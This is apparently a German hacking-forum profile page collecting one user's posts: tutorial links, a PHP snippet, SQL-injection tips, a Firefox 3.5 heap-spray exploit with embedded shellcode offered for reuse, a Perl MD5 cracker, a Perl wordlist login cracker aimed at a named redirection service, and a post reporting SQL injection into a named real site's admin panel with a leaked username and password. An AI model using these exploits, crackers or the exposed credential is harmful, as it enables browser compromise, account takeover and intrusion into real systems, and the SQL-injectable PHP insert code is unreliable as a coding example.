Bin noch auf FH, Back2Hack, darkc0de, Creative-Coding aktiv
Beiträge von fred777
-
-
Hier auch noch einige mit denen ich damals ganz gute Erfahrungen gemacht habe, (heute natürlich auch nicht :))
Kannst gerne einfügen bei dir
[hide]
http://tutorial.schornboeck.net/inhalt.htm
http://www.cplusplus.com/doc/tutorial/
http://www.c-plusplus.de/cms/m…x&req=viewsdownload&sid=2
http://www.mathematik.uni-marburg.de/~cpp/
http://ladedu.com/cpp/
http://www.intap.net/~drw/cpp/
http://www.java2s.com/Tutorial/Cpp/CatalogCpp.htm[/hide] -
Ich führ das von //ins0.! mal weiter, wiegesagt, wenn du die Werte hast und in Variablen gespeichert, kannst du mit INSERT INTO die Werte in die DB schreiben:
PHP
Alles anzeigen<?php $host="loaclhost"; $user="schattenbaum"; $pass="schattenbaump0rn"; $db="schattendb"; mysql_connect($host,$user,$pass); mysql_select_db($db); //$hits werden deklariert //$name werden deklariert...blahh //$description wird deklariert blah $insert="INSERT INTO info (`hits`, `name`, `description`) VALUES ('".$hits."','".$name."', '".$description."')"; $result=mysql_query($insert); $output = mysql_fetch_array($result); print "<br />Hits: $output[0]<br />Name: $output[1]<br />Description: $output[2]"; ?>
Ich hoffe das hilft dir ebenfalls weiter..
-
Es kann aber auch ein falscher Charset sein, versuch es mal mit:
unhex(hex(foobar)) -
Ich sage es mal so, der Humor ist manchmal schon abartig, trotzdem mir gefällts auf meine Art
-
Noch neu, allerdings bei den Tests nicht immer funktionsfähig, so auch bei mir, trotzdem netter Fund, vielleicht funktioniert es ja bei euch, Shellcode könnt ihr ja selbst einfügen, bzw anpassen...
HTML
Alles anzeigen<html> <head> <title>Firefox 3.5 Vulnerability</title> Firefox 3.5 Heap Spray Vulnerabilty </br> Author: SBerry aka Simon Berry-Byrne </br> Thanks to HD Moore for the insight and Metasploit for the payload <div id=content"> <p> <FONT> </FONT> </p> <p> <FONT>Loremipsumdoloregkuw</FONT></p> <p> <FONT>Loremipsumdoloregkuwiert</FONT> </p> <p> <FONT>Loremikdkw </FONT> </p> </div> <script language=JavaScript> /* Calc.exe */ var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); /* Heap Spray Code */ oneblock = unescape("%u0c0c%u0c0c"); var fullblock = oneblock; while (fullblock.length<0x60000) { fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode; } var searchArray = new Array() function escapeData(data) { var i; var c; var escData=''; for(i=0;i<data.length;i++) { c=data.charAt(i); if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c); escData+=c; } return escData; } function DataTranslator(){ searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["str] = "blah"; var newElement = document.getElementById("content") if (document.getElementsByTagName) { var i=0; pTags = newElement.getElementsByTagName("p") if (pTags.length > 0) while (i<pTags.length) { oTags = pTags[i].getElementsByTagName("font") searchArray[i+1] = new Array() if (oTags[0]) { searchArray[i+1]["str"] = oTags[0].innerHTML; } i++ } } } function GenerateHTML() { var html = ""; for (i=1;i<searchArray.length;i++) { html += escapeData(searchArray[i]["str"]) } } DataTranslator(); GenerateHTML() </script> </body> </html> <html><body></body></html>
-
Noch viel Spass sonst noch bei deinen Projects
Und wenn du mal Hilfe brauchst, ICQ -> me -
Hi Dude, Wissen über das PE Format kann nie schaden, schau dir einfach mal den Aufbau an und als Anfang ist ein Crypter oder Packer nicht schlecht, zumal es auch viele Sources gibt
http://win32assembly.online.fr/pe-tut1.html -
Hoffe ich auch, willkommen hier und HF
-
Naja, ist gestern entstanden, er knackt MD5 Hashs per Bruteforce oder Wordlist..
Was noch hinzukommen wird ist:
+ Listenimportierung
+ Suche in Online-DatenbankenFunktioniert auch wunderbar bis jetzt
Code:
[hide]Code
Alles anzeigen#!usr/bin/perl #Use moduls and variables use Digest::MD5 qw(md5_hex); my ($word,@words,$line,$res,$leng,$charset,$hash,$mincount,$maxcount,$ret,$cnt,$choise,$lim,$i,@Raws); #It looks cool :> system("cls"); print q { ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ MD5 Hash Cracker ~ ~ + cracking with wordlists ~ + cracking with bruteforce ~ ~ + use charset aAdx for bruting ~ + coded by fred777 and thx to iman ~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ }; #Select your first choise, the method print "Use wordlists or bruteforce [W or B]: "; chomp($res =<STDIN>); ########################################################## # The wordlist modul ########################################################## if ($res eq "W" | $res eq "w") { print "\n\nPlease insert MD5 Hash: "; chomp($hash = <STDIN>); $leng = length($hash); if($leng!=32) { print "\nIts not a valid md5 hash..\n\n"; exit; system("Pause"); } print "Please insert path: "; chomp(my $path = <STDIN>); # search hash in a foreach loop open(WORD, "$path") || die "\nError, its a bad path\n"; foreach(<WORD>) { chomp; $line = md5_hex($_); if($line =~ $hash) { print "\n\nCracked word: $_ \n\n"; } } } ########################################################## # The bruteforce modul ########################################################## if ($res eq "B" | $res eq "b") { print "\nPlease insert hash: "; chomp($hash=<STDIN>); if (length($hash) != 32) { print "\nIts not a valid md5 hash..\n\n"; exit; system("Pause"); } # Choose counts and charsets print "Charset eingeben: "; chomp($charset=<STDIN>); print "mincount: "; chomp($mincount=<STDIN>); print "maxcount: "; chomp($maxcount=<STDIN>); if ($charset=~"a") { $choise = "abcdefghijklmnopqrstuvwxyz";} if ($charset=~"A") { $choise = $choise. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";} if ($charset=~"d") { $choise = $choise."1234567890";} if ($charset=~"x") { $choise = $choise. "!§\"\$%&/()=?`*+~'#-_|<>°^´\}][{ .:,;";} for (my $tim=$mincount;$tim<=$maxcount;$tim++){ crack ($tim); } # The cracking CORE sub crack{ $lim = shift; @Raws = (); for ($i =0;$i<$lim;$i++){ $Raws[i] = 0;} do{ for ($i =0;$i<$lim;$i++) { if ($Raws[$i] > length($choise)-1) { if ($i==$lim-1) { print "\nNo Results, please change your settings..\n"; $cnt=0; return false; } $Raws[$i+1]++; $Raws[$i]=0; } } $ret = ""; for (my $i =0;$i<$lim;$i++){ $ret = $ret . substr($choise,$Raws[$i],1);} $word = md5_hex($ret); $cnt++; print " -$word $ret\n"; if ($hash eq $word) { die "\ncracked word: $ret\n"; } $Raws[0]++; } while($Raws[$lim-1]<length($choise)); } } print "\n\n"; system("Pause");
[/hide]
-
Nein, als ich es getestet habe (vor 1 Monat) nicht
-
Ich stell das mal hier rein, damit nicht jeder dieses Zeug brutet..
Wenn ich Zeit habe erweitere ich es noch für alle bekannteren Redirection Services :>Code:
[hide]Perl
Alles anzeigen#!/usr/bin/perl use strict; use warnings; use LWP::UserAgent; print "#################################\n"; print "# 6x.to Wordlist Cracker #\n"; print "# fred777 and thx to h0yt3r #\n"; print "# Usage [PATH] [USERNAME] #\n"; print "#################################\n"; system("Pause"); my $ua = LWP::UserAgent->new(); my $path = shift or die("Usage $0 [Path] [Username]\n"); my $user = shift or die("Pls specifly a Username\n"); open (LIST,'<',$path) or die "File doesnt exist\n"; foreach my $password (<LIST>) { $password =~ s/\n//; my $resp = $ua->get ("http://www.6x.to/edit.php?user=$user&domain=6x.to&pass=$password&action=login"); die("Request failed\n") unless ($resp->is_success); if ($resp->content =~ /Controlpanel for/) { print "$user.6x.to cracked\n"; print "password is: $password\n"; last; } else { print $password."\n"; } } system("Pause");
[/hide]
-
WB Steve
-
-
Ist sowieso Version 4:
http://www.martin-schulz.info/…3,4,5,6,7,8,9,10,11,12,13
Nebenbei, PRoxyseiten sortieren schon manchmal, doch stimmen tun diese Ergebnisse selten, lieber selbst checkenEdit:
Done:
http://www.martin-schulz.info/admin/
http://www.martin-schulz.info/…12,13+from+user+limit+1,1mariomommertz:apfelkuchen
etc..